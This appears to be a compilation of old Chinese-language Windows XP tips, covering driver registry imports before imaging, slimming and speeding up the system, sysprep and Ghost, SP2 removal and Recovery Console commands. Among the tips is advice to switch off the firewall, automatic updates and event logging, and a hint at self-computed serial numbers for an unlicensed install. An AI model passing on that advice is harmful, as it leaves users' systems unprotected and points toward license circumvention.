[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_6269]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak]
"Type"=dword:00000001
"Start"=dword:00000000
"ErrorControl"=dword:00000001
"Tag"=dword:00000022
"ImagePath"=hex(2):53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00, 52,00,49,00,56,00,45,00,52,00,53,00,5c,00,66,00,61,00,73,00,74,00,74,00,72, 00,61,00,6b,00,2e,00,73,00,79,00,73,00,00,00
"Group"="SCSI Miniport"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak\Parameters]

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak\Parameters\PnpInterface]
"5"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02, 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00, 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00, 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00, 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00, 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01, 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

将上面的注册表内容保存为 Fasttrak.reg 文件备用。这样我们就得到了所需的所有文件：
FASTTRAK.INF
FASTTRAK.CAT
FASTTRAK.SYS
FASTTRAK.REG

七、在需要封装的“母机”上将 FASTTRAK.INF、FASTTRAK.CAT 复制到 C:\WINDOWS\inf 目录里（可能不需要，还是建议执行）。
将 FASTTRAK.SYS 复制到 C:\WINDOWS\system32\drivers 目录里。
将 FASTTRAK.REG 导入注册表。

以上操作可以启动“母机”进行直接操作、进行封装（对于FAT32格式的ghost文件也可进行操作）。

八、清理现场。
在得到注册表的微机上的“设备管理器”中有可能会出现刚才所装的硬件，直接删除即可。至于注册表文件和 C:\WINDOWS\system32\drivers\FASTTRAK.SYS，留在那里应该没什么大问题。

九、本方法在未安装 Promise Fasttrak TX2 IDE RAID 卡微机执行完后，再将硬盘接到该RAID卡后测试成功。


系统还原的启动

《一键清理系统垃圾》

系统还原的启动

    其实，系统还原的启动都是 通过运行rstrui程序来进行的，我们可以找到系统还原的后台程序，进入C:windowssystem32restore目录，找到rstrui文件，然后右键单击选择“发送到→桌面快捷方式”，以后只需双击该快捷方式便可快速启动系统还原。在DOS环境的命令行提示符下直接输入“rstrui”或是单击“开始→运行”输入“rstrui”后回车，也可以同样启动系统还原。


运行

《一键清理系统垃圾》

运行

convert c:/fs:ntfs

帮助
convert /?


让WinXP更苗条、性感、速度更快

《一键清理系统垃圾》

让WinXP更苗条、性感、速度更快

总体设想：让WinXP更苗条、性感、速度更快，使用更便捷。
为了达到这个目的，我们主要从四个方面入手：
1、减少磁盘空间占用
2、终止不常用的系统服务
3、安全问题
4、另外一些技巧
首先问一下，你是不是很想激活XP，不。。。准确的说你是不是想在ms的站上能够升级。如果答案是肯定的话，那我们就先来探讨一下安装的问题，目前流行的V4、V5、V6版本我还是比较推荐的，尤其是V5和V6这两个。安装的过程中有个序列号的问题，我建议你先在机子上算好，然后用这个序列号安装，通常这样安装的XP都可以到MS的站点自由更新。
如果你是已经安装好的XP了，但用的序列号是里到处流传人人都用的那些，也没关系，我们后面会说用sysrep来重新封装的时候会解决序列号更换的问题。
我假设你已经安装完XP了，come on baby ~~
一、瘦身行动
1、在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。删除系统备份文件吧：开始→运行→sfc.exe /purgecache 近3xxM。
2、删除驱动备份： %windows%\driver cache\i386目录下的driver.cab文件，通常这个文件是76M。
3、偶没有看help的习惯，所以保留着%windows%\help目录下的东西对我来说是一种伤害，呵呵。。。都干掉，近4xM。
4、一会在升级完成后你还会发现%windows%\多了许多类似$NtUninstallQ311889$这些目录，都干掉吧，1x-3xM。
5、正好硬盘中还有win2000/server等，所以顺便把pagefile.sys文件都指向一个地方：控制面板→系统→性能—高级→虚拟内存→更改，注意要点“设置”才会生效。
6、卸载不常用组件：用记事本修改\%windows%\inf\sysoc.inf，用查找/替换功能，在查找框中输入,hide，全部替换为空。这样，就把所有的,hide都去掉了，存盘退出后再运行“添加-删除程序”，就会看见“添加/删除 Windows 组件”中多出不少选项；删除掉游戏啊，码表啊等不用的东西。
7、刪除\windows\ime下不用的輸入法，8xM。我重新安装了自己用的zrm输入法，赫赫。
8、如果实在空间紧张，启用NTFS的压缩功能，这样还会少用2x% 的空间，不过我没作。
9、关了系统还原，这破功能对我这样常下载、测试软件的人来说简直是灾难，用鼠标右健单击桌面上的“我的电脑”，选择“属性”，找到“系统还原”，选择“在所有驱动器上关闭系统还原”呵呵，又可以省空间了。
10、还有几个文件，挺大的，也没什么用。。。。忘了名字 ：（ ，刚安装的系统可以用查找功能查找大于50M的文件来看看，应该能找到的。
如果你能按照上面的过程做完，你的原本1.4G的XP，完全可以减少到800以下。
二、加速计划
WinXP的启动会有许多影响速度的功能，尽管ms说已经作最优化处理过，但对我们来说还是有许多可定制之处。我一般是这样来做的。
1、修改注册表的run键，取消那几个不常用的东西，比如Windows Messenger 。启用注册表管理器：开始→运行→Regedit→找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS” /BACKGROUND 这个键值，右键→删除，世界清静多了，顺便把那几个什么cfmon的都干掉吧。
2、修改注册表来减少预读取，减少进度条等待时间，效果是进度条跑一圈就进入登录画面了，开始→运行→regedit启动注册表编辑器，找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters， 有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none（无）。
3、关闭系统属性中的特效，这可是简单有效的提速良方。点击开始→控制面板→系统→高级→性能→设置→在视觉效果中，设置为调整为最佳性能→确定即可。这样桌面就会和win2000很相似的，我还是挺喜欢XP的蓝色窗口，所以在“在窗口和按钮上使用视觉样式”打上勾，这样既能看到漂亮的蓝色界面，又可以加快速度。
4、我用Windows commadner＋Winrar来管理文件，Win XP的ZIP支持对我而言连鸡肋也不如，因为不管我需不需要，开机系统就打开个zip支持，本来就闲少的系统资源又少了一分，点击开始→运行，敲入：“regsvr32 /u zipfldr.dll”双引号中间的，然后回车确认即可，成功的标志是出现个提示窗口，内容大致为：zipfldr.dll中的Dll UnrgisterServer成功。
5、据说XP的一个系统服务Qos，这个调度要占用一定的网络带宽，像我这样的一毛不拔的人是无法忍受的，去掉方法是：开始菜单→运行→键入 gpedit.msc ，出现“组策略”窗口， 展开 "管理模板”→“网络” ， 展开 "QoS 数据包调度程序"， 在右边窗右键单击“限制可保留带宽" ，在属性中的“设置”中有“限制可保留带宽" ，选择“已禁用”，确定即可。当上述修改完成并应用后，用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler（QoS 数据包调度程序）"。说明修改成功，否则说明修改失败，顺便把网络属性中的那个Qos 协议也一起干掉（卸载）吧。
6、快速浏览局域网络的共享
通常情况下，Windows XP在连接其它计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法是开始→运行→Regedit→在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace。在此键值下，会有个{D6277990-4C6A-11CF-8D87-00AA0060F5BF}键，把它删掉后，重新启动计算机，Windows XP就不再检查预定任务了，hoho~~~ ，速度明显提高啦！
7、关掉调试器Dr. Watson
我好像从win95年代开始一次也没用过这东西，可以这样取消：打开册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug子键分支，双击在它下面的Auto键值名称，将其“数值数据”改为0，最后按F5刷新使设置生效，这样就取消它的运行了。沿用这个思路，我们可以把所有具备调试功能的选项取消，比如蓝屏时出现的memory.dmp，在“我的电脑→属性→高级→设置→写入调试信息→选择无”等等。
8、被我终止的服务列表以及相关说明
1)alerter 错误警报
2)automatic updates windows 自动更新
3)background intelligent transfer service 微软说使用空闲的网络带宽传数据
4)clipbook 与远程电脑来共享剪贴板内容，我看还是免了吧
5)Computer browser　说什么要维护网络更新列表
6)DHCP client 我不需要这东西
7)Distributed link tracking client 保持局域网连接更新等信息，偶很少用局域网，这东西占用４M左右内存。
8)Distributed Transaction coordinator 协调xxx，和上面的差不多
9)DNS Client 我不需要这东西
10)Error reporting service 错误报告
11)Event Log 系统日志纪录
12)Fast user switching compatibility 用户切换
13)help and support 帮助
14)Human interface device access 据说是智能设备。。。
15)IMAPI CD-burning COM service　偶不用这个刻碟
16)Indexing service 索引，索引什么呢？
17)Internet Connection Firewall(ICF) ICF防火墙
18)IPSEC Services 这个我不懂，你想知道问Quack去
19)Logical Disk manager administrative service 配置磁盘
20)messenger 好像net send 等东西用的就是这个功能
21)MS software shadow copy provider 卷复制备份的
22)Net Logon 我可不想让黑客远程登录进来，关！
23)Netmeeting remote desktop sharing 我不用netmeeting
24)Network DDE　 动态数据交换传输
25)Network DDE DSDM　和上面差不多
26)Network Location Awareness 关，我的机子不作共享
27)NTLM Security support provider－telnet　呵呵，关！
28)Performance logs and alert 将系统状态写日志或发警告
29)Portable media serial number 关！
30)Print Spooler 打印机，不幸的是我的机子不连接Print ~
31) QoS RSVP 关！
32)Remote desktop help session manager 远程帮助服务
33)remote Procedure Call LOCATOR 管理RPC
34)remote registry 远程管理注册表
35)removable storage
36)routing and remote access 我干脆禁用了它
37)security accounts manager 我的系统只是一个客户系统，不用iis。
38)smart card
39)smart card helper 关！！！
40)SSDP Discovery service 我用不到这个
41)system event notification 如果是服务器肯定要记录的
42)system restore service 系统还原服务
43)task scheduler windows 计划服务
44)Telephony 拨号服务，我不拨号还不行吗？
45)telnet
46)terminal services 终端服务
47)uninterruptible power supply UPS，我没有呀
48)universal plug and play device host 太先进了点，用不到
49)upload manager 关了也能传输文件的
50)volume shadow copy 又是备份，晕
51)webclient 没用过
52)Windows Installer ＭＳＩ服务，我一直关着。
53)windows image acquisition (WIA) 数码设备用的
54)windows management instrumentation driver extensions 关了
55)windows time 时间服务
56)wireless zero configuration 无线网络，偶用不到的
57)WMI perfromance adapter 关！
这里面的一些服务是刚开始就是关的，但我忘了，所以只好把现在系统中关闭的服务基本都列了出来。你根据自己的情况酌情处理吧。
三、我安全吗
多了不谈，基本的共享还是得关的：
修改注册表为以下两个样式：
去除共享
——————————————————————
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000
"AutoSharewks"=dword:00000000
——————————————————————
去除IPC$管理
——————————————————————
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000001
——————————————————————
或者将上面两个保存成个.REG文件，然后双击导入就可以了。

顺便把不要脸的的3721也屏蔽，在hosts文件中加入：
127.0.0.1 cnsmin.3721.com
127.0.0.1 www.3721.net

四、其他技巧
1、给鼠标右键增加个复制到.../移动到...功能
—————————————————————
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Copy To]
@="{C2FBB630-2971-11D1-A18C-00C04FD75D13}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Move To]
@="{C2FBB631-2971-11D1-A18C-00C04FD75D13}"
————————————————————————
将上面内容保存成add.reg文件，然后双击导入就可以了。
2、关了错误报告，KAO ！这东西搞得我像个微软免费的测试员似的：点击控制面板---->系统---->高级---->右下角--->错误报告---->禁用错误汇报——>确定！
3、取消分组显示：右键单击任务栏的空白区域，在弹出的菜单中选择“属性”，在弹出的窗口中，取消“分组相似任务栏按钮”前面的对钩，确定就可以了。
4、找回经典的登录窗口，WinXP默认的登录界面虽然漂亮，但如果你想用一个列表中没有的用户登录，你会发现无从下手，改回经典窗口的方法是：点击“开始”→“控制面板”→“用户账户”→“更改用户登录或注销的方式”→把“使用欢迎屏幕”前面的对钩取消，最后点“应用选项”就OK啦。
5、将自己最常用的输入法设置一个快捷键：点击“开始”→“控制面板”→“区域和语言选项”→在弹出的窗口中选择“语言”→“详细信息”→“键设置”在弹出的窗口中找到自己用的输入法，点“更改按键顺序”→在这里选一个快捷键就可以了。
6、关闭计算机时自动结束不响应的任务，注册表：HKEY_CURRENT_USER\Control Panel\Desktop 中的“AugoEndTasks”的键值改为“1”
7、关闭自动更新：右键单击“我的电脑”，点击属性，点击“自动更新”，在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。
8、减少开机磁盘扫描等待时间，开始→运行，键入“chkntfs/t:0”

然后连接到ms站点顺便升级一次就算优化基本完成，对于XP而言，可以采用许多内部命令来看看优化情况，比如tasklist.exe /svc 可以查看系统服务实际使用情况。
优化一个系统，挺麻烦的。所以我们把他保存起来，我们用Ghost生成.GHO文件，这样就可以拿给别人炫耀一下啦，在Ghost之前先要作一个事情，清除系统硬件、注册等信息，否则克隆到不同的机子上将无法启动，在Winxp安装盘上找Deploy.cab 中的sysprep.exe文件。
执行sysprep.exe，选择“重新封装”，下面的标记中可以选择“已提前激活”，还可以选择封装完成后是关机还是重新启动。封装完成后，我们再用带有Ghost的系统盘启动，用Ghost来生成备份.GHO镜像，备份完成！
在执行封装后，重新开机，XP会让我们输入序列号，文中开头所提到的换序列号的办法就是这样换。


XP中不能正常IE浏览不正常一例

《一键清理系统垃圾》

XP中不能正常IE浏览不正常一例

今天上网好好的，突然不能正常显示网页内容，
具体情况：字体大小不正常，网页表格无法正常显示，背景图片不能显示……
通过恢复IE所有默认选项无法解决，有人说上了XX网站~
我想都不可能啊 一秒前是正常的 我也没弄什么 一秒后就不正常了
难道真的要重新安装IE？？？

原来是在“控制面板”---“辅助功能选项”---“显示”——我开启了“使用高对比度”。
真的被WINDOWS搞败了！！！要不真的重新安装IE我想也未必能搞定，如果想不到这里，可能要重新安装系统了，后果不堪设想哦~


安全删除Windows XP SP2的四种方法

《一键清理系统垃圾》

安全删除Windows XP SP2的四种方法

    WindowsXP ServicePack2的发布引来无数人的关注，许多人也迫不及待的下载安装，然而SP2的众多新功能和许多改进也许并不会和你机器中原有的硬件或者应用程序很好的兼容，相信这也为许多人带来了麻烦。如果为此重装系统那真是得不偿失。许多人一定很关心如何能在保证系统正常运行的情况下卸载SP2。

    使用控制面板中的“添加或删除程序”工具

    1. 单击“开始”，单击“运行”，在“打开”框中键入 appwiz.cpl，然后单击“确定”。

    2. 单击选中“显示更新”复选框。

    3. 单击“Windows XP Service Pack 2”，然后单击“删除”。

    4. 按照屏幕上的说明操作，以删除 Windows XP SP2。

    使用隐藏的 $NtServicePackUninstall$ 文件夹

    1. 单击“启动”，单击“运行”，在“打开”框中键入c:windows$NtServicePackUninstall$spuninstspuninst.exe，然后单击“确定”。

    2. Windows XP Service Pack 2 删除向导启动之后，单击“下一步”。

    3. 按照屏幕上的说明操作，以删除 Windows XP SP2。

    使用系统恢复过程

    1. 单击“开始”，单击“运行”，在“打开”框中键入 %SystemRoot%System32restorerstrui.exe，然后单击“确定”。

    2. 单击“恢复我的计算机到一个较早的时间”，然后单击“下一步”。

    3. 单击选中安装 Windows XP SP2 时的日期，然后单击“还原点”框中的“Installed Window XP Service Pack 2”。

    4. 单击“下一步”，然后按照屏幕上的说明操作，以删除 Windows XP SP2。

    使用故障恢复控制台

    如果您尝试了上述所有方法，仍然无法成功地删除 Windows XP SP2，请按照下列步骤操作： 1. 将 Windows XP 启动盘插入软盘驱动器，或将 Windows XP CD-ROM 插入 CD-ROM 或 DVD-ROM 驱动器，然后重新启动计算机。当屏幕上出现以下消息时，按任意键，从 Windows XP CD 启动计算机：按任意键从光盘引导

    注意：您的计算机必须被配置为从 CD 驱动器或 DVD 驱动器启动。有关如何将计算机配置为从 CD 驱动器或 DVD 驱动器启动的更多信息，请参见计算机附带的文档，或与计算机制造商联系。

    2. 当屏幕上出现以下消息时，请按 R 键，启动故障恢复控制台： 欢迎使用安装程序

    3. 选择您的 Windows XP 安装。此安装通常位于 C:Windows 目录下。

    4. 根据提示键入管理员密码。如果您没有管理员密码，请按 Enter 键。

    5. 在命令提示符处，键入 cd $ntservicepackuninstall$spuninst，然后按 Enter 键。

    6. 警告：当您完成这一步骤后，您将无法终止删除过程。

    在命令提示符下，键入 batch spuninst.txt，然后按 Enter 键。

    7. 删除过程结束后，键入 exit，然后按 Enter 键。

    8. 重新启动计算机。

    重要说明：计算机重新启动后，Windows Explorer (Explorer.exe) 不会运行，您必须按照下列步骤操作：

    a. 按 Ctrl+Alt+Delete 启动任务管理器。

    b. 单击“应用程序”选项卡，然后单击“新任务”。

    c. 在“打开”框中，键入 regedit，然后单击“确定”。

    d. 找到下面的注册表子项并单击它：

    HKEY_LOCAL_MACHINESystemCurrentControlSetServicesRpcSs

    e. 右键单击“ObjectName”，单击“修改”，然后在“数值数据”框中键入 LocalSystem。

    f. 重新启动计算机

    9. 使用上面的某种方法从计算机上删除 Windows XP SP2。

作者：
来源：天极yesky


安装和使用 Windows XP 的恢复控制台

《一键清理系统垃圾》

安装和使用 Windows XP 的恢复控制台

概要

Windows 恢复控制台的功能是帮助基于 Windows 的计算机在未正确启动或根本无法启动时进行恢复操作。 在安全模式和其他启动方法都无效时，您可以考虑使用恢复控制台。 仅对高级用户（能够使用基本命令确定并找到有问题的驱动程序和文件）建议使用此方法。 此外，还要求您是本地管理员。

如何安装恢复控制台

您可以在计算机上安装恢复控制台，在您无法重新启动 Windows 时使用。 启动时可以从现有操作系统的列表中选择恢复控制台选项。 对于重要的服务器和 IT 员工的工作站最好安装恢复控制台。 本文介绍了如何为您的 Windows XP 计算机安装恢复控制台。 您必须具有该计算机的管理权，才能安装恢复控制台。
安装恢复控制台的步骤
您可以直接从 Windows XP CD 引导运行恢复控制台，但是更便捷的方法是设置恢复控制台为引导菜单上的启动选项。 要直接从 CD 引导运行，参见下文中的“使用恢复控制台”部分。

要安装恢复控制台，请执行下面的步骤：
将 Windows XP CD 插入 CD-ROM 驱动器。

单击开始，然后单击运行。

在打开框中，键入 d :\i386\winnt32.exe /cmdcons，此处 d 是 CD-ROM 驱动器的驱动器号。

出现说明恢复控制台选项的 Windows 安装对话框。 系统提示您确认安装。 单击是开始安装过程。

重新启动计算机。 下次启动计算机时，您将在引导菜单上看到“Microsoft Windows 恢复控制台”项。

备注： 您也可以通过网络共享点使用 UNC 安装恢复控制台。

使用恢复控制台

您可以启用和禁用服务、格式化驱动器、读写本地驱动器（包括使用 NT 文件系统 (NTFS) 格式的驱动器）上的数据，还可以执行许多其他管理任务。 在您需要从磁盘或 CD-ROM 上复制文件到硬盘上修复计算机，或者重新配置导致计算机无法正常启动的服务时，恢复控制台更能发挥作用。

如果您无法启动计算机，可以从 Microsoft Windows XP 启动盘或从 Windows XP CD-ROM 运行恢复控制台。 本文章介绍如何执行此任务。

当您的计算机安装了 Windows XP 后，您需要使用 Windows XP 启动盘或Windows XP CD-ROM 启动计算机和使用恢复控制台。

有关如何创建 Windows XP 的启动盘（独立于 Windows XP）的其他信息，单击下面的文章编号查看 Microsoft 知识库中的文章：
Q310994Obtaining Windows XP Setup Boot Disks（获取 Windows XP 安装启动盘）
备注： 要从 Windows XP CD-ROM 启动计算机，您需要配置计算机的基本输入/输出系统（BIOS）才能从 CD-ROM 驱动器引导。

要从 Windows XP 启动盘或 Windows XP CD-ROM 运行恢复控制台，请按照下列步骤操作：
将 Windows XP 启动盘插入软盘驱动器或将 Windows XP CD-ROM 插入 CD-ROM 驱动器，然后重新启动计算机。

按提示，单击选中从 CD-ROM 驱动器启动计算机所需的选项。

出现“欢迎使用安装程序”屏幕时，按 R 键启动恢复控制台。

如果您使用的是双引导或多引导计算机，请选择需要从恢复控制台访问的系统安装。

按提示，键入管理员密码。 如果管理员密码为空，只需按 ENTER 键。

在命令提示处，键入相应的命令诊断和修复 Windows XP 的安装。

要查看用于恢复控制台的命令列表，请在命令提示处键入 recovery console commands 或 help ，然后按 ENTER 键。

要查看特定命令的信息，请在命令提示处键入 help 命令名，然后按 ENTER 键。

要退出恢复控制台并重新启动计算机，请在命令提示处键入 exit，然后按 ENTER 键。

使用恢复控制台命令提示符

恢复控制台所使用的特殊命令提示符不同于与普通的 Windows 命令提示符。 恢复控制台有自己的命令解释程序。 按恢复控制台的提示键入管理员（本地管理员，不是域管理员）密码，才能进入其命令解释程序。

恢复控制台启动时，可以按 F6 键安装访问 SCSI 或 RAID 硬盘所需的第三方 SCSI 或 RAID 驱动程序。 此提示的作用与安装操作系统过程中的作用相同。

恢复控制台需要几分钟后启动。 出现恢复控制台菜单时，会显示一个带编号的列表，列出本计算机上安装的所有 Windows（通常仅有一项 -c:\Windows-exists）。 即使在只有一项的情况下，也要键入一数字再按 ENTER 键。 如果您在按 ENTER 键之前没有选择数字，计算机将重新启动并重复此过程。

当您看到 %SystemRoot% 的提示（通常是 C:\Windows）时，可以开始使用恢复控制台中的命令。

命令操作

以下列表介绍了可在恢复控制台中使用的命令：
Attrib 更改文件或子目录的属性。

Batch 执行您在文本文件、Inputfile 中指定的命令，Outputfile 存储命令的输出结果。 如果忽略 Outputfile 参数，输出结果将显示在屏幕上。

Bootcfg 用于对 Boot.ini 文件（设置引导配置和恢复）进行操作。

CD (Chdir) 的操作仅限于当前 Windows 安装的系统目录，可移动媒体，所有硬盘分区的根目录，或本地安装源。

Chkdsk 即使驱动器没有标志为有问题，/p 开关也会运行 Chkdsk 。 /r 开关查找到坏的扇区并恢复可读信息，此开关包含 /p 的功能。 Chkdsk 要求 Autochk。 Chkdsk 在启动（或引导）文件夹中自动查找 Autochk.exe 文件。 如果 Chkdsk 在启动文件夹中未查找到此文件，将查找 Windows 2000 安装 CD-ROM。 如果 Chkdsk 未能找到安装 CD-ROM，Chkdsk 提示向用户询问 Autochk.exe 文件的位置。

Cls 清除屏幕。

Copy 将文件复制到目标位置。 在默认情况下，目标位置不能是可移动媒体，也不能使用通配符。 从 Windows 2000 安装 CD-ROM 复制压缩文件会自动将该文件解压缩。

Del (Delete) 删除文件。 操作范围限于当前 Windows 安装的系统目录、可移动媒体、所有硬盘分区的根目录，或本地安装源。 默认情况下不能使用通配符。

Dir 显示所有文件的列表，包括隐藏文将和系统文件。

Disable 禁用 Windows 系统服务或驱动程序。 变量 service _or_ driver 是您希望禁用的服务或驱动程序的名称。 您使用此命令禁用一项服务时，在将类型改变为 SERVICE_DISABLED 之前，计算机会显示该服务的原有启动类型。 请您记下原有启动类型，以便您能使用 enable 命令重新启动该服务。

Diskpart 管理硬盘上的分区。 /add 选项创建新的分区， /delete 选项删除现有的分区。 变量 device 是新分区的设备名（例如 \device\harddisk0）。 变量 drive 是您要删除的分区的驱动器号（例如，D），partition 是您要删除分区的特定名称（例如： \device\harddisk0\partition1) 并可被用于代替 drive 变量。 变量 size 就是新分区的大小（以兆字节计）。

Enable 启用 Windows 系统服务或驱动程序。 变量 service_or_driver 是您希望启用的服务或驱动程序的名称，start_type 是启用服务的启动类型。 启动类型使用下列格式之一：

SERVICE_BOOT_START
SERVICE_SYSTEM_START
SERVICE_AUTO_START
SERVICE_DEMAND_START
Exit 退出恢复控制台，然后重新启动计算机。

Expand 展开一个压缩文件。 变量 source 是您希望展开的文件，默认情况下您不能使用通配符字符。 变量 destination 是新文件的目录，默认情况下，目标不能是可移动媒体，也不能是只读，您可以使用 attrib 命令去除目标目录的只读属性。 当源文件含多个文件时，要求使用选项 /f:filespec，此选项允许使用通配符。 /y 开关禁用覆盖确认提示。 /d 开关指定这些文件不应展开并显示源文件中的文件目录。

Fixboot 在系统分区上写入新的引导扇区。

Fixmbr 修复引导分区的主引导代码。 变量 device 是一个可选名称，指定需要新 MBR 的设备，如果目标是引导设备可以忽略此变量。

Format 格式化磁盘。 /q 参数执行快速格式化，/fs 参数指定文件系统。

Help 如果您没有使用命令变量指定命令， help 列出恢复控制台支持的所有命令。

Listsvc 显示计算机上所有可用服务和驱动程序。

Logon 显示检测到的 Windows 安装并请求用于这些安装的本地管理员的密码。 使用此命令可以转至另一安装或子目录。

Map 显示当前使用中的设备映射。 包含 arc 选项，指定使用高级 RISC 计算 (ARC) 路径（Boot.ini 的格式），而不用 Windows 设备路径。

MD (Mkdir) 的操作范围仅限于当前 Windows 安装的系统目录、可移动媒体、所有硬盘分区的根目录，或本地安装源。

More/Type 在屏幕上显示指定的文本文件（例如，文件名）。

Rd (Rmdir) 的操作范围仅限于当前 Windows 安装的系统目录、可移动媒体、所有硬盘分区的根目录，或本地安装源。

Ren (Rename) 的操作范围仅限于当前 Windows 安装的系统目录、可移动媒体、所有硬盘分区的根目录，或本地安装源。 您不能指定新的驱动器或路径作为目标。

Set 显示并设置控制台环境变量。

Systemroot 设定当前目录为 %SystemRoot% 。

恢复控制台的规则

使用恢复控制台时，会用到一些环境规则。 键入 set 查看当前的环境。 默认情况下的规则如下：
AllowAllPaths = FALSE ，禁止访问进入恢复控制台时所选的系统安装之外的目录和子目录。

AllowRemovableMedia = FALSE ，禁止将可移动媒体作为复制文件的目标。

AllowWildCards = FALSE ，禁止在命令中使用通配符支持，例如 copy 或 del 命令。

NoCopyPrompt = FALSE ，意味着当您覆盖现有文件时，恢复控制台会提示您确认。

如何删除恢复控制台

若要删除恢复控制台，请按照下列步骤操作：
重新启动您的计算机，单击开始，单击我的电脑，然后双击恢复控制台所在的硬盘。

在工具菜单上，单击文件夹选项，然后单击查看选项卡。

单击“显示隐藏文件和文件夹”，单击清除“隐藏受保护的操作系统文件”复选框，然后单击确定。

在根文件夹处，删除 Cmdcons 文件夹和 Cmldr 文件。

在根文件夹处，右键单击 Boot.ini 文件，然后单击属性。

单击清除只读复选框，然后单击确定。

警告： 错误修改 Boot.ini 文件可能会导致您的计算机无法重新启动。 请确认您只删除了恢复控制台的项。 此外，在完成此过程后，建议您将 Boot.ini 文件的属性改回只读状态。 在 Microsoft Windows 记事本中打开 Boot.ini 文件，删除恢复控制台项。 文件类似如下显示：

C:\cmdcons\bootsect.dat="Microsoft Windows Recovery Console" /cmdcons
保存并关闭该文件。

在无人参与的安装过程中安装控制台

在无人参与的 Windows 安装过程中安装恢复控制台需要使用 Cmdlines.txt 文件。设置无人参与的 Windows 安装并在 cmdlines.txt 文件中加入下行：
" 路径 \winnt32 /cmdcons /unattend" （包括引号）
此处路径 是 Winnt32.exe 程序文件的路径。 解析完 Cmdlines.txt 文件后，恢复控制台将在 Windows 无人参与的安装的后端进行安装。

参考
您可以使用组策略改变规则或扩展恢复控制台的能力。


常见Windows XP启动故障及解决方法

《一键清理系统垃圾》

常见Windows XP启动故障及解决方法

1、NTLDR is missing当你从Win9X升级到Windows XP的时候

1)、Clone以后的问题：当你想把使用Clone制作的Win9x升级到Windows XP，那么很容易出现一句提示：NTLDR is missing。

  当然，要出现这种情况必须满足下列要求：

   a)、系统/启动分区是FAT32文件系统。

   b)、计算机的启动使用了INT-13中断扩展启动。一般现在的主流电脑都是使用了这种方式。

   c)、因为在Clone的时候，刻录后的系统的存放于FAT32 BIOS Parameter Block(BPD)的值和物理驱动器的几何分布不匹配。

  但是为什么可以启动Win9X呢？原因是这样的：Win9x启动的时候忽略了BPD的值，即使这个值是非法的。但是在Win200/XP里面需要这个值，如果这个值是非法的，那么启动将失败。

  解决：重写FAT32 BPB里面正确的值 ，然后使用Windows XP里面Fixboot命令重写Windows XP启动代码即可。具体的操作如下：使用一张含有SYS.COM的Win9X启动盘启动电脑，执行SYS C:命令，然后重新启动，会发现无法启动Windows XP，这不要紧，这是正常的现象。然后再次重新启动，使用Windows XP安装光盘启动，进入故障恢复控制台，执行fixboot即可。如果你不会使用故障恢复控制台，那么还有一个方法：在Win9X里面执行Windows XP安装，系统拷贝完文件以后会重新启动，启动的是后手已经要快速按下方向键的上或下箭头，然后选择Windows回到Win9X下，接着编辑Boot.ini文件，确认你的Boot.ini文件和你电脑上Windows XP的启动相匹配，最后删除C盘根目录上以$开头的全部文件即可。

2)、文件丢失/破坏：这个文件位于C盘根目录，我们只需要从Windows XP安装光盘里面提取这个文件，然后放到C盘根目录上即可。

2、I/O错误，Win9X启动失败

   这个问题一般是由于错误删除C盘根目录上的一个启动Win9x的重要文件bootsect.dos造成的。这个文件储存了启动Win9x的必须代码，而且这个文件的创建是在安装Windows XP的时候自动创建的，Windows XP里面并没有相应的命令可以直接解决这个问题。但是我们可以采用另外一种方法解决。

